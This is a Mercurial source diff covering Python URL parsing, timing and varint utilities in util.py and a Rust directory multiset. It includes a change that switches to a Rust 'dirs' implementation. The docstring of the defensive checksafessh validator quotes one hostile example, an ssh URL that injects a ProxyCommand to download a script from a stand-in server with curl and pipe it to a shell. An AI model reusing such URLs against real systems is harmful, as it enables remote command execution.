2646 2648 patterns += '|' + prefix
2647 2649 if len(prefix) > 1:
2648 2650 prefix_char = prefix[1:]
2649 2651 else:
2650 2652 prefix_char = prefix
2651 2653 mapping[prefix_char] = prefix_char
2652 2654 r = remod.compile(br'%s(%s)' % (prefix, patterns))
2653 2655 return r.sub(lambda x: fn(mapping[x.group()[1:]]), s)
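
# A simple substitution sketch (hypothetical mapping); note the escaped
# two-character prefix, since '$' is special in regular expressions:
#
#   interpolate(br'\$', {b'user': b'alice'}, b'hello $user')
#   # -> b'hello alice'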
2654 2656
2655 2657 def getport(port):
2656 2658 """Return the port for a given network service.
2657 2659
2658 2660 If port is an integer, it's returned as is. If it's a string, it's
2659 2661 looked up using socket.getservbyname(). If there's no matching
2660 2662 service, error.Abort is raised.
2661 2663 """
2662 2664 try:
2663 2665 return int(port)
2664 2666 except ValueError:
2665 2667 pass
2666 2668
2667 2669 try:
2668 2670 return socket.getservbyname(pycompat.sysstr(port))
2669 2671 except socket.error:
2670 2672 raise error.Abort(_("no port number associated with service '%s'")
2671 2673 % port)
2672 2674
2673 2675 class url(object):
2674 2676 r"""Reliable URL parser.
2675 2677
2676 2678 This parses URLs and provides attributes for the following
2677 2679 components:
2678 2680
2679 2681 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
2680 2682
2681 2683 Missing components are set to None. The only exception is
2682 2684 fragment, which is set to '' if present but empty.
2683 2685
2684 2686 If parsefragment is False, fragment is included in query. If
2685 2687 parsequery is False, query is included in path. If both are
2686 2688 False, both fragment and query are included in path.
2687 2689
2688 2690 See http://www.ietf.org/rfc/rfc2396.txt for more information.
2689 2691
2690 2692 Note that for backward compatibility reasons, bundle URLs do not
2691 2693 take host names. That means 'bundle://../' has a path of '../'.
2692 2694
2693 2695 Examples:
2694 2696
2695 2697 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2696 2698 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2697 2699 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2698 2700 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2699 2701 >>> url(b'file:///home/joe/repo')
2700 2702 <url scheme: 'file', path: '/home/joe/repo'>
2701 2703 >>> url(b'file:///c:/temp/foo/')
2702 2704 <url scheme: 'file', path: 'c:/temp/foo/'>
2703 2705 >>> url(b'bundle:foo')
2704 2706 <url scheme: 'bundle', path: 'foo'>
2705 2707 >>> url(b'bundle://../foo')
2706 2708 <url scheme: 'bundle', path: '../foo'>
2707 2709 >>> url(br'c:\foo\bar')
2708 2710 <url path: 'c:\\foo\\bar'>
2709 2711 >>> url(br'\\blah\blah\blah')
2710 2712 <url path: '\\\\blah\\blah\\blah'>
2711 2713 >>> url(br'\\blah\blah\blah#baz')
2712 2714 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2713 2715 >>> url(br'file:///C:\users\me')
2714 2716 <url scheme: 'file', path: 'C:\\users\\me'>
2715 2717
2716 2718 Authentication credentials:
2717 2719
2718 2720 >>> url(b'ssh://joe:xyz@x/repo')
2719 2721 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2720 2722 >>> url(b'ssh://joe@x/repo')
2721 2723 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2722 2724
2723 2725 Query strings and fragments:
2724 2726
2725 2727 >>> url(b'http://host/a?b#c')
2726 2728 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2727 2729 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2728 2730 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2729 2731
2730 2732 Empty path:
2731 2733
2732 2734 >>> url(b'')
2733 2735 <url path: ''>
2734 2736 >>> url(b'#a')
2735 2737 <url path: '', fragment: 'a'>
2736 2738 >>> url(b'http://host/')
2737 2739 <url scheme: 'http', host: 'host', path: ''>
2738 2740 >>> url(b'http://host/#a')
2739 2741 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
2740 2742
2741 2743 Only scheme:
2742 2744
2743 2745 >>> url(b'http:')
2744 2746 <url scheme: 'http'>
2745 2747 """
2746 2748
2747 2749 _safechars = "!~*'()+"
2748 2750 _safepchars = "/!~*'()+:\\"
2749 2751 _matchscheme = remod.compile('^[a-zA-Z0-9+.\\-]+:').match
2750 2752
2751 2753 def __init__(self, path, parsequery=True, parsefragment=True):
2752 2754 # We slowly chomp away at path until we have only the path left
2753 2755 self.scheme = self.user = self.passwd = self.host = None
2754 2756 self.port = self.path = self.query = self.fragment = None
2755 2757 self._localpath = True
2756 2758 self._hostport = ''
2757 2759 self._origpath = path
2758 2760
2759 2761 if parsefragment and '#' in path:
2760 2762 path, self.fragment = path.split('#', 1)
2761 2763
2762 2764 # special case for Windows drive letters and UNC paths
2763 2765 if hasdriveletter(path) or path.startswith('\\\\'):
2764 2766 self.path = path
2765 2767 return
2766 2768
2767 2769 # For compatibility reasons, we can't handle bundle paths as
2768 2770 # normal URLs
2769 2771 if path.startswith('bundle:'):
2770 2772 self.scheme = 'bundle'
2771 2773 path = path[7:]
2772 2774 if path.startswith('//'):
2773 2775 path = path[2:]
2774 2776 self.path = path
2775 2777 return
2776 2778
2777 2779 if self._matchscheme(path):
2778 2780 parts = path.split(':', 1)
2779 2781 if parts[0]:
2780 2782 self.scheme, path = parts
2781 2783 self._localpath = False
2782 2784
2783 2785 if not path:
2784 2786 path = None
2785 2787 if self._localpath:
2786 2788 self.path = ''
2787 2789 return
2788 2790 else:
2789 2791 if self._localpath:
2790 2792 self.path = path
2791 2793 return
2792 2794
2793 2795 if parsequery and '?' in path:
2794 2796 path, self.query = path.split('?', 1)
2795 2797 if not path:
2796 2798 path = None
2797 2799 if not self.query:
2798 2800 self.query = None
2799 2801
2800 2802 # // is required to specify a host/authority
2801 2803 if path and path.startswith('//'):
2802 2804 parts = path[2:].split('/', 1)
2803 2805 if len(parts) > 1:
2804 2806 self.host, path = parts
2805 2807 else:
2806 2808 self.host = parts[0]
2807 2809 path = None
2808 2810 if not self.host:
2809 2811 self.host = None
2810 2812 # path of file:///d is /d
2811 2813 # path of file:///d:/ is d:/, not /d:/
2812 2814 if path and not hasdriveletter(path):
2813 2815 path = '/' + path
2814 2816
2815 2817 if self.host and '@' in self.host:
2816 2818 self.user, self.host = self.host.rsplit('@', 1)
2817 2819 if ':' in self.user:
2818 2820 self.user, self.passwd = self.user.split(':', 1)
2819 2821 if not self.host:
2820 2822 self.host = None
2821 2823
2822 2824 # Don't split on colons in IPv6 addresses without ports
2823 2825 if (self.host and ':' in self.host and
2824 2826 not (self.host.startswith('[') and self.host.endswith(']'))):
2825 2827 self._hostport = self.host
2826 2828 self.host, self.port = self.host.rsplit(':', 1)
2827 2829 if not self.host:
2828 2830 self.host = None
2829 2831
2830 2832 if (self.host and self.scheme == 'file' and
2831 2833 self.host not in ('localhost', '127.0.0.1', '[::1]')):
2832 2834 raise error.Abort(_('file:// URLs can only refer to localhost'))
2833 2835
2834 2836 self.path = path
2835 2837
2836 2838 # leave the query string escaped
2837 2839 for a in ('user', 'passwd', 'host', 'port',
2838 2840 'path', 'fragment'):
2839 2841 v = getattr(self, a)
2840 2842 if v is not None:
2841 2843 setattr(self, a, urlreq.unquote(v))
2842 2844
2843 2845 @encoding.strmethod
2844 2846 def __repr__(self):
2845 2847 attrs = []
2846 2848 for a in ('scheme', 'user', 'passwd', 'host', 'port', 'path',
2847 2849 'query', 'fragment'):
2848 2850 v = getattr(self, a)
2849 2851 if v is not None:
2850 2852 attrs.append('%s: %r' % (a, pycompat.bytestr(v)))
2851 2853 return '<url %s>' % ', '.join(attrs)
2852 2854
2853 2855 def __bytes__(self):
2854 2856 r"""Join the URL's components back into a URL string.
2855 2857
2856 2858 Examples:
2857 2859
2858 2860 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
2859 2861 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
2860 2862 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
2861 2863 'http://user:pw@host:80/?foo=bar&baz=42'
2862 2864 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
2863 2865 'http://user:pw@host:80/?foo=bar%3dbaz'
2864 2866 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
2865 2867 'ssh://user:pw@[::1]:2200//home/joe#'
2866 2868 >>> bytes(url(b'http://localhost:80//'))
2867 2869 'http://localhost:80//'
2868 2870 >>> bytes(url(b'http://localhost:80/'))
2869 2871 'http://localhost:80/'
2870 2872 >>> bytes(url(b'http://localhost:80'))
2871 2873 'http://localhost:80/'
2872 2874 >>> bytes(url(b'bundle:foo'))
2873 2875 'bundle:foo'
2874 2876 >>> bytes(url(b'bundle://../foo'))
2875 2877 'bundle:../foo'
2876 2878 >>> bytes(url(b'path'))
2877 2879 'path'
2878 2880 >>> bytes(url(b'file:///tmp/foo/bar'))
2879 2881 'file:///tmp/foo/bar'
2880 2882 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
2881 2883 'file:///c:/tmp/foo/bar'
2882 2884 >>> print(url(br'bundle:foo\bar'))
2883 2885 bundle:foo\bar
2884 2886 >>> print(url(br'file:///D:\data\hg'))
2885 2887 file:///D:\data\hg
2886 2888 """
2887 2889 if self._localpath:
2888 2890 s = self.path
2889 2891 if self.scheme == 'bundle':
2890 2892 s = 'bundle:' + s
2891 2893 if self.fragment:
2892 2894 s += '#' + self.fragment
2893 2895 return s
2894 2896
2895 2897 s = self.scheme + ':'
2896 2898 if self.user or self.passwd or self.host:
2897 2899 s += '//'
2898 2900 elif self.scheme and (not self.path or self.path.startswith('/')
2899 2901 or hasdriveletter(self.path)):
2900 2902 s += '//'
2901 2903 if hasdriveletter(self.path):
2902 2904 s += '/'
2903 2905 if self.user:
2904 2906 s += urlreq.quote(self.user, safe=self._safechars)
2905 2907 if self.passwd:
2906 2908 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2907 2909 if self.user or self.passwd:
2908 2910 s += '@'
2909 2911 if self.host:
2910 2912 if not (self.host.startswith('[') and self.host.endswith(']')):
2911 2913 s += urlreq.quote(self.host)
2912 2914 else:
2913 2915 s += self.host
2914 2916 if self.port:
2915 2917 s += ':' + urlreq.quote(self.port)
2916 2918 if self.host:
2917 2919 s += '/'
2918 2920 if self.path:
2919 2921 # TODO: similar to the query string, we should not unescape the
2920 2922 # path when we store it, the path might contain '%2f' = '/',
2921 2923 # which we should *not* escape.
2922 2924 s += urlreq.quote(self.path, safe=self._safepchars)
2923 2925 if self.query:
2924 2926 # we store the query in escaped form.
2925 2927 s += '?' + self.query
2926 2928 if self.fragment is not None:
2927 2929 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2928 2930 return s
2929 2931
2930 2932 __str__ = encoding.strmethod(__bytes__)
2931 2933
2932 2934 def authinfo(self):
2933 2935 user, passwd = self.user, self.passwd
2934 2936 try:
2935 2937 self.user, self.passwd = None, None
2936 2938 s = bytes(self)
2937 2939 finally:
2938 2940 self.user, self.passwd = user, passwd
2939 2941 if not self.user:
2940 2942 return (s, None)
2941 2943 # authinfo[1] is passed to urllib2 password manager, and its
2942 2944 # URIs must not contain credentials. The host is passed in the
2943 2945 # URIs list because Python < 2.4.3 uses only that to search for
2944 2946 # a password.
2945 2947 return (s, (None, (s, self.host),
2946 2948 self.user, self.passwd or ''))
2947 2949
2948 2950 def isabs(self):
2949 2951 if self.scheme and self.scheme != 'file':
2950 2952 return True # remote URL
2951 2953 if hasdriveletter(self.path):
2952 2954 return True # absolute for our purposes - can't be joined()
2953 2955 if self.path.startswith(br'\\'):
2954 2956 return True # Windows UNC path
2955 2957 if self.path.startswith('/'):
2956 2958 return True # POSIX-style
2957 2959 return False
2958 2960
2959 2961 def localpath(self):
2960 2962 if self.scheme == 'file' or self.scheme == 'bundle':
2961 2963 path = self.path or '/'
2962 2964 # For Windows, we need to promote hosts containing drive
2963 2965 # letters to paths with drive letters.
2964 2966 if hasdriveletter(self._hostport):
2965 2967 path = self._hostport + '/' + self.path
2966 2968 elif (self.host is not None and self.path
2967 2969 and not hasdriveletter(path)):
2968 2970 path = '/' + path
2969 2971 return path
2970 2972 return self._origpath
2971 2973
2972 2974 def islocal(self):
2973 2975 '''whether localpath will return something that posixfile can open'''
2974 2976 return (not self.scheme or self.scheme == 'file'
2975 2977 or self.scheme == 'bundle')
2976 2978
2977 2979 def hasscheme(path):
2978 2980 return bool(url(path).scheme)
2979 2981
2980 2982 def hasdriveletter(path):
2981 2983 return path and path[1:2] == ':' and path[0:1].isalpha()
2982 2984
2983 2985 def urllocalpath(path):
2984 2986 return url(path, parsequery=False, parsefragment=False).localpath()
2985 2987
2986 2988 def checksafessh(path):
2987 2989 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2988 2990
2989 2991 This is a sanity check for ssh urls. ssh will parse the first item as
2990 2992 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2991 2993 Let's prevent these potentially exploited urls entirely and warn the
2992 2994 user.
2993 2995
2994 2996 Raises an error.Abort when the url is unsafe.
2995 2997 """
2996 2998 path = urlreq.unquote(path)
2997 2999 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2998 3000 raise error.Abort(_('potentially unsafe url: %r') %
2999 3001 (pycompat.bytestr(path),))
3000 3002
3001 3003 def hidepassword(u):
3002 3004 '''hide user credential in a url string'''
3003 3005 u = url(u)
3004 3006 if u.passwd:
3005 3007 u.passwd = '***'
3006 3008 return bytes(u)
3007 3009
3008 3010 def removeauth(u):
3009 3011 '''remove all authentication information from a url string'''
3010 3012 u = url(u)
3011 3013 u.user = u.passwd = None
3012 3014 return bytes(u)
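
# Both helpers round-trip through the url class (hypothetical URL):
#
#   hidepassword(b'http://joe:secret@example.com/repo')
#   # -> b'http://joe:***@example.com/repo'
#   removeauth(b'http://joe:secret@example.com/repo')
#   # -> b'http://example.com/repo'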
3013 3015
3014 3016 timecount = unitcountfn(
3015 3017 (1, 1e3, _('%.0f s')),
3016 3018 (100, 1, _('%.1f s')),
3017 3019 (10, 1, _('%.2f s')),
3018 3020 (1, 1, _('%.3f s')),
3019 3021 (100, 0.001, _('%.1f ms')),
3020 3022 (10, 0.001, _('%.2f ms')),
3021 3023 (1, 0.001, _('%.3f ms')),
3022 3024 (100, 0.000001, _('%.1f us')),
3023 3025 (10, 0.000001, _('%.2f us')),
3024 3026 (1, 0.000001, _('%.3f us')),
3025 3027 (100, 0.000000001, _('%.1f ns')),
3026 3028 (10, 0.000000001, _('%.2f ns')),
3027 3029 (1, 0.000000001, _('%.3f ns')),
3028 3030 )
3029 3031
3030 3032 @attr.s
3031 3033 class timedcmstats(object):
3032 3034 """Stats information produced by the timedcm context manager on entering."""
3033 3035
3034 3036 # the starting value of the timer as a float (meaning and resolution are
3035 3037 # platform dependent, see util.timer)
3036 3038 start = attr.ib(default=attr.Factory(lambda: timer()))
3037 3039 # the number of seconds as a floating point value; starts at 0, updated when
3038 3040 # the context is exited.
3039 3041 elapsed = attr.ib(default=0)
3040 3042 # the number of nested timedcm context managers.
3041 3043 level = attr.ib(default=1)
3042 3044
3043 3045 def __bytes__(self):
3044 3046 return timecount(self.elapsed) if self.elapsed else '<unknown>'
3045 3047
3046 3048 __str__ = encoding.strmethod(__bytes__)
3047 3049
3048 3050 @contextlib.contextmanager
3049 3051 def timedcm(whencefmt, *whenceargs):
3050 3052 """A context manager that produces timing information for a given context.
3051 3053
3052 3054 On entering, a timedcmstats instance is produced.
3053 3055
3054 3056 This context manager is reentrant.
3055 3057
3056 3058 """
3057 3059 # track nested context managers
3058 3060 timedcm._nested += 1
3059 3061 timing_stats = timedcmstats(level=timedcm._nested)
3060 3062 try:
3061 3063 with tracing.log(whencefmt, *whenceargs):
3062 3064 yield timing_stats
3063 3065 finally:
3064 3066 timing_stats.elapsed = timer() - timing_stats.start
3065 3067 timedcm._nested -= 1
3066 3068
3067 3069 timedcm._nested = 0
3068 3070
3069 3071 def timed(func):
3070 3072 '''Report the execution time of a function call to stderr.
3071 3073
3072 3074 During development, use as a decorator when you need to measure
3073 3075 the cost of a function, e.g. as follows:
3074 3076
3075 3077 @util.timed
3076 3078 def foo(a, b, c):
3077 3079 pass
3078 3080 '''
3079 3081
3080 3082 def wrapper(*args, **kwargs):
3081 3083 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3082 3084 result = func(*args, **kwargs)
3083 3085 stderr = procutil.stderr
3084 3086 stderr.write('%s%s: %s\n' % (
3085 3087 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
3086 3088 time_stats))
3087 3089 return result
3088 3090 return wrapper
3089 3091
3090 3092 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3091 3093 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3092 3094
3093 3095 def sizetoint(s):
3094 3096 '''Convert a space specifier to a byte count.
3095 3097
3096 3098 >>> sizetoint(b'30')
3097 3099 30
3098 3100 >>> sizetoint(b'2.2kb')
3099 3101 2252
3100 3102 >>> sizetoint(b'6M')
3101 3103 6291456
3102 3104 '''
3103 3105 t = s.strip().lower()
3104 3106 try:
3105 3107 for k, u in _sizeunits:
3106 3108 if t.endswith(k):
3107 3109 return int(float(t[:-len(k)]) * u)
3108 3110 return int(t)
3109 3111 except ValueError:
3110 3112 raise error.ParseError(_("couldn't parse size: %s") % s)
3111 3113
3112 3114 class hooks(object):
3113 3115 '''A collection of hook functions that can be used to extend a
3114 3116 function's behavior. Hooks are called in lexicographic order,
3115 3117 based on the names of their sources.'''
3116 3118
3117 3119 def __init__(self):
3118 3120 self._hooks = []
3119 3121
3120 3122 def add(self, source, hook):
3121 3123 self._hooks.append((source, hook))
3122 3124
3123 3125 def __call__(self, *args):
3124 3126 self._hooks.sort(key=lambda x: x[0])
3125 3127 results = []
3126 3128 for source, hook in self._hooks:
3127 3129 results.append(hook(*args))
3128 3130 return results
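
# Sketch: hooks fire ordered by source name, not registration order.
#
#   h = hooks()
#   h.add(b'zzz-ext', lambda v: v * 2)
#   h.add(b'aaa-ext', lambda v: v + 1)
#   h(3)  # -> [4, 6]: 'aaa-ext' runs before 'zzz-ext'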
3129 3131
3130 3132 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3131 3133 '''Yields lines for a nicely formatted stacktrace.
3132 3134 Skips the 'skip' last entries, then returns the last 'depth' entries.
3133 3135 Each file+linenumber is formatted according to fileline.
3134 3136 Each line is formatted according to line.
3135 3137 If line is None, it yields:
3136 3138 length of longest filepath+line number,
3137 3139 filepath+linenumber,
3138 3140 function
3139 3141
3140 3142 Not to be used in production code, but very convenient while developing.
3141 3143 '''
3142 3144 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3143 3145 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3144 3146 ][-depth:]
3145 3147 if entries:
3146 3148 fnmax = max(len(entry[0]) for entry in entries)
3147 3149 for fnln, func in entries:
3148 3150 if line is None:
3149 3151 yield (fnmax, fnln, func)
3150 3152 else:
3151 3153 yield line % (fnmax, fnln, func)
3152 3154
3153 3155 def debugstacktrace(msg='stacktrace', skip=0,
3154 3156 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3155 3157 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3156 3158 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3157 3159 By default it will flush stdout first.
3158 3160 It can be used everywhere and intentionally does not require an ui object.
3159 3161 Not to be used in production code, but very convenient while developing.
3160 3162 '''
3161 3163 if otherf:
3162 3164 otherf.flush()
3163 3165 f.write('%s at:\n' % msg.rstrip())
3164 3166 for line in getstackframes(skip + 1, depth=depth):
3165 3167 f.write(line)
3166 3168 f.flush()
3167 3169
3168 3170 class dirs(object):
3169 3171 '''a multiset of directory names from a dirstate or manifest'''
3170 3172
3171 3173 def __init__(self, map, skip=None):
3172 3174 self._dirs = {}
3173 3175 addpath = self.addpath
3174 3176 if safehasattr(map, 'iteritems') and skip is not None:
3175 3177 for f, s in map.iteritems():
3176 3178 if s[0] != skip:
3177 3179 addpath(f)
3178 3180 else:
3179 3181 for f in map:
3180 3182 addpath(f)
3181 3183
3182 3184 def addpath(self, path):
3183 3185 dirs = self._dirs
3184 3186 for base in finddirs(path):
3185 3187 if base in dirs:
3186 3188 dirs[base] += 1
3187 3189 return
3188 3190 dirs[base] = 1
3189 3191
3190 3192 def delpath(self, path):
3191 3193 dirs = self._dirs
3192 3194 for base in finddirs(path):
3193 3195 if dirs[base] > 1:
3194 3196 dirs[base] -= 1
3195 3197 return
3196 3198 del dirs[base]
3197 3199
3198 3200 def __iter__(self):
3199 3201 return iter(self._dirs)
3200 3202
3201 3203 def __contains__(self, d):
3202 3204 return d in self._dirs
3203 3205
3204 3206 if safehasattr(parsers, 'dirs'):
3205 3207 dirs = parsers.dirs
3206 3208
3209 if rustdirs is not None:
3210 dirs = rustdirs
3211
3207 3212 def finddirs(path):
3208 3213 pos = path.rfind('/')
3209 3214 while pos != -1:
3210 3215 yield path[:pos]
3211 3216 pos = path.rfind('/', 0, pos)
3212 3217 yield ''
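
# Whichever implementation was selected above (pure Python, C, or Rust),
# the observable behavior is the same; a sketch:
#
#   list(finddirs(b'a/b/x'))  # -> [b'a/b', b'a', b'']
#   d = dirs([b'a/b/x', b'a/c/y'])
#   b'a' in d    # -> True (referenced by both files)
#   d.delpath(b'a/b/x')
#   b'a/b' in d  # -> False, while b'a' is still present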
3213 3218
3214 3219
3215 3220 # convenient shortcut
3216 3221 dst = debugstacktrace
3217 3222
3218 3223 def safename(f, tag, ctx, others=None):
3219 3224 """
3220 3225 Generate a name that is safe to rename f to in the given context.
3221 3226
3222 3227 f: filename to rename
3223 3228 tag: a string tag that will be included in the new name
3224 3229 ctx: a context, in which the new name must not exist
3225 3230 others: a set of other filenames that the new name must not be in
3226 3231
3227 3232 Returns a file name of the form oldname~tag[~number] which does not exist
3228 3233 in the provided context and is not in the set of other names.
3229 3234 """
3230 3235 if others is None:
3231 3236 others = set()
3232 3237
3233 3238 fn = '%s~%s' % (f, tag)
3234 3239 if fn not in ctx and fn not in others:
3235 3240 return fn
3236 3241 for n in itertools.count(1):
3237 3242 fn = '%s~%s~%s' % (f, tag, n)
3238 3243 if fn not in ctx and fn not in others:
3239 3244 return fn
3240 3245
3241 3246 def readexactly(stream, n):
3242 3247 '''read n bytes from stream.read and abort if less was available'''
3243 3248 s = stream.read(n)
3244 3249 if len(s) < n:
3245 3250 raise error.Abort(_("stream ended unexpectedly"
3246 3251 " (got %d bytes, expected %d)")
3247 3252 % (len(s), n))
3248 3253 return s
3249 3254
3250 3255 def uvarintencode(value):
3251 3256 """Encode an unsigned integer value to a varint.
3252 3257
3253 3258 A varint is a variable length integer of 1 or more bytes. Each byte
3254 3259 except the last has the most significant bit set. The lower 7 bits of
3255 3260 each byte store the 2's complement representation, least significant group
3256 3261 first.
3257 3262
3258 3263 >>> uvarintencode(0)
3259 3264 '\\x00'
3260 3265 >>> uvarintencode(1)
3261 3266 '\\x01'
3262 3267 >>> uvarintencode(127)
3263 3268 '\\x7f'
3264 3269 >>> uvarintencode(1337)
3265 3270 '\\xb9\\n'
3266 3271 >>> uvarintencode(65536)
3267 3272 '\\x80\\x80\\x04'
3268 3273 >>> uvarintencode(-1)
3269 3274 Traceback (most recent call last):
3270 3275 ...
3271 3276 ProgrammingError: negative value for uvarint: -1
3272 3277 """
3273 3278 if value < 0:
3274 3279 raise error.ProgrammingError('negative value for uvarint: %d'
3275 3280 % value)
3276 3281 bits = value & 0x7f
3277 3282 value >>= 7
3278 3283 bytes = []
3279 3284 while value:
3280 3285 bytes.append(pycompat.bytechr(0x80 | bits))
3281 3286 bits = value & 0x7f
3282 3287 value >>= 7
3283 3288 bytes.append(pycompat.bytechr(bits))
3284 3289
3285 3290 return ''.join(bytes)
3286 3291
3287 3292 def uvarintdecodestream(fh):
3288 3293 """Decode an unsigned variable length integer from a stream.
3289 3294
3290 3295 The passed argument is anything that has a ``.read(N)`` method.
3291 3296
3292 3297 >>> try:
3293 3298 ... from StringIO import StringIO as BytesIO
3294 3299 ... except ImportError:
3295 3300 ... from io import BytesIO
3296 3301 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3297 3302 0
3298 3303 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3299 3304 1
3300 3305 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3301 3306 127
3302 3307 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3303 3308 1337
3304 3309 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3305 3310 65536
3306 3311 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3307 3312 Traceback (most recent call last):
3308 3313 ...
3309 3314 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3310 3315 """
3311 3316 result = 0
3312 3317 shift = 0
3313 3318 while True:
3314 3319 byte = ord(readexactly(fh, 1))
3315 3320 result |= ((byte & 0x7f) << shift)
3316 3321 if not (byte & 0x80):
3317 3322 return result
3318 3323 shift += 7
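# Editorial round-trip sanity check for the two helpers above:
#
#     >>> uvarintdecodestream(stringio(uvarintencode(1337)))
#     1337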
@@ -1,355 +1,357 b''
1 1 // dirs_multiset.rs
2 2 //
3 3 // Copyright 2019 Raphaël Gomès <rgomes@octobus.net>
4 4 //
5 5 // This software may be used and distributed according to the terms of the
6 6 // GNU General Public License version 2 or any later version.
7 7
8 8 //! A multiset of directory names.
9 9 //!
10 10 //! Used to count the references to directories in a manifest or dirstate.
11 11 use std::collections::hash_map::Entry;
12 12 use std::collections::HashMap;
13 13 use std::ops::Deref;
14 14 use {DirsIterable, DirstateEntry, DirstateMapError};
15 15
16 16 #[derive(PartialEq, Debug)]
17 17 pub struct DirsMultiset {
18 18 inner: HashMap<Vec<u8>, u32>,
19 19 }
20 20
21 21 impl Deref for DirsMultiset {
22 22 type Target = HashMap<Vec<u8>, u32>;
23 23
24 24 fn deref(&self) -> &Self::Target {
25 25 &self.inner
26 26 }
27 27 }
28 28
29 29 impl DirsMultiset {
30 30 /// Initializes the multiset from a dirstate or a manifest.
31 31 ///
32 32 /// If `skip_state` is provided, skips dirstate entries with equal state.
33 33 pub fn new(iterable: DirsIterable, skip_state: Option<i8>) -> Self {
34 34 let mut multiset = DirsMultiset {
35 35 inner: HashMap::new(),
36 36 };
37 37
38 38 match iterable {
39 39 DirsIterable::Dirstate(vec) => {
40 40 for (ref filename, DirstateEntry { state, .. }) in vec {
41 41 // This `if` is optimized out of the loop
42 42 if let Some(skip) = skip_state {
43 43 if skip != state {
44 44 multiset.add_path(filename);
45 45 }
46 46 } else {
47 47 multiset.add_path(filename);
48 48 }
49 49 }
50 50 }
51 51 DirsIterable::Manifest(vec) => {
52 52 for ref filename in vec {
53 53 multiset.add_path(filename);
54 54 }
55 55 }
56 56 }
57 57
58 58 multiset
59 59 }
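// Editorial illustration (not in the original source): with
// `skip_state = Some('n' as i8)`, dirstate entries whose state is 'n'
// do not contribute to the counts; manifest entries carry no state,
// so `skip_state` never filters them (see test_dirsmultiset_new_skip).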
60 60
61 61 /// Returns the slice up to the next directory name from right to left,
62 62 /// without a trailing slash
63 63 fn find_dir(path: &[u8]) -> &[u8] {
64 64 let mut path = path;
65 65 loop {
66 66 if let Some(new_pos) = path.len().checked_sub(1) {
67 67 if path[new_pos] == b'/' {
68 68 break &path[..new_pos];
69 69 }
70 70 path = &path[..new_pos];
71 71 } else {
72 72 break &[];
73 73 }
74 74 }
75 75 }
76 76
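// Editorial illustration (not in the original source): `find_dir` scans
// right to left for the last b'/' and returns everything before it:
//   find_dir(b"a/b/c") == b"a/b"
//   find_dir(b"a/b/")  == b"a/b"
//   find_dir(b"a")     == b""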
77 77 /// Increases the count of the deepest directory contained in the path.
78 78 ///
79 79 /// If the directory is not yet in the map, adds its parents.
80 80 pub fn add_path(&mut self, path: &[u8]) {
81 81 let mut pos = path.len();
82 82
83 83 loop {
84 84 let subpath = Self::find_dir(&path[..pos]);
85 85 if let Some(val) = self.inner.get_mut(subpath) {
86 86 *val += 1;
87 87 break;
88 88 }
89 89 self.inner.insert(subpath.to_owned(), 1);
90 90
91 91 pos = subpath.len();
92 92 if pos == 0 {
93 93 break;
94 94 }
95 95 }
96 96 }
97 97
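// Editorial illustration: on an empty map, add_path(b"a/b/c") inserts
// "a/b", "a" and "" each with count 1; a later add_path(b"a/d") finds
// "a" already present, bumps it to 2 and stops, leaving shallower
// entries such as "" untouched.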
98 98 /// Decreases the count of the deepest directory contained in the path.
99 99 ///
100 100 /// If this was its only reference, removes the entry and walks up,
101 101 /// removing parents until one is merely decremented instead.
102 102 /// If the directory is not in the map, something horrible has happened.
103 103 pub fn delete_path(
104 104 &mut self,
105 105 path: &[u8],
106 106 ) -> Result<(), DirstateMapError> {
107 107 let mut pos = path.len();
108 108
109 109 loop {
110 110 let subpath = Self::find_dir(&path[..pos]);
111 111 match self.inner.entry(subpath.to_owned()) {
112 112 Entry::Occupied(mut entry) => {
113 113 let val = entry.get().clone();
114 114 if val > 1 {
115 115 entry.insert(val - 1);
116 116 break;
117 117 }
118 118 entry.remove();
119 119 }
120 120 Entry::Vacant(_) => {
121 return Err(DirstateMapError::PathNotFound(path.to_owned()))
121 return Err(DirstateMapError::PathNotFound(
122 path.to_owned(),
123 ))
122 124 }
123 125 };
124 126
125 127 pos = subpath.len();
126 128 if pos == 0 {
127 129 break;
128 130 }
129 131 }
130 132
131 133 Ok(())
132 134 }
133 135 }
134 136
135 137 #[cfg(test)]
136 138 mod tests {
137 139 use super::*;
138 140
139 141 #[test]
